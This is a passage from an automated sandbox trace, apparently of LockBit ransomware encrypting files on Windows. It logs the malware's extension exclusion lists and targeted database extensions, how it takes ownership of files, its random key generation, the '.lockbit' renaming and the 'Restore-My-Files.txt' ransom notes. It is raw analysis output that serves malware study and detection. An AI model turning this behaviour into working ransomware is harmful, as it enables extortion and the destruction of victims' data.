[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.706] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.707] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.707] CloseHandle (hObject=0x3b4) returned 1 [0081.708] free (_Block=0x77d800) [0081.708] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.708] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.708] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.708] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3118) returned 1 [0081.708] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.709] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.721] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.721] malloc (_Size=0xea) returned 0x77d800 [0081.721] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xea, FileInformationClass=0xa) returned 0xc0000008 [0081.721] free (_Block=0x77d800) [0081.721] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 1 [0081.721] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt") returned 79 [0081.721] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.721] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ae3e27, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ae3e27, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0081.721] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0081.721] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0081.721] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0081.721] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.721] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.721] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.721] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.721] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.721] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.721] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.721] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.721] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.721] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.721] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.721] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.722] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.722] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.722] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.722] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.722] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.722] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.722] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.722] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.723] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.723] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.723] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0081.723] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0081.723] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0081.723] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0081.723] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0081.723] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0081.723] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0081.723] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\") returned="" [0081.723] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png") returned=".png" [0081.723] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.723] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.723] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.723] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.724] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.724] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.724] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.724] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.724] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.724] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.724] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.724] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.724] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png.lockbit") returned 97 [0081.724] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.726] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.726] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.726] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.727] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.727] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.727] RtlFreeAnsiString (AnsiString="\\") [0081.727] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.727] malloc (_Size=0x200) returned 0x77d800 [0081.727] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.727] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.727] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.727] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.728] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.728] CloseHandle (hObject=0x3b4) returned 1 [0081.728] free (_Block=0x77d800) [0081.728] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.728] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.729] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.729] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4955) returned 1 [0081.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.730] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.737] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.737] malloc (_Size=0xd8) returned 0x77d800 [0081.737] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd8, FileInformationClass=0xa) returned 0xc0000008 [0081.737] free (_Block=0x77d800) [0081.737] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 1 [0081.737] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt") returned 79 [0081.737] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.737] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b5623e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b5623e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0081.737] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0081.738] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0081.738] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0081.738] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.738] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.738] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.739] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.739] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.739] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.739] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.739] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.739] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.739] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.739] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.739] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.740] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.740] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0081.740] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0081.740] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0081.740] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0081.740] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0081.740] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0081.740] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0081.740] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\") returned="" [0081.740] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png") returned=".png" [0081.740] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.740] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.740] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.740] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.741] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.741] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.741] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.741] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.741] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.741] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.741] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.741] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.741] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png.lockbit") returned 103 [0081.741] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.743] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.743] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.743] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.743] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.743] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.744] RtlFreeAnsiString (AnsiString="\\") [0081.744] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.744] malloc (_Size=0x200) returned 0x77d800 [0081.744] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.744] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.744] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.744] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.744] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.745] CloseHandle (hObject=0x3b4) returned 1 [0081.745] free (_Block=0x77d800) [0081.745] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.745] CreateIoCompletionPort 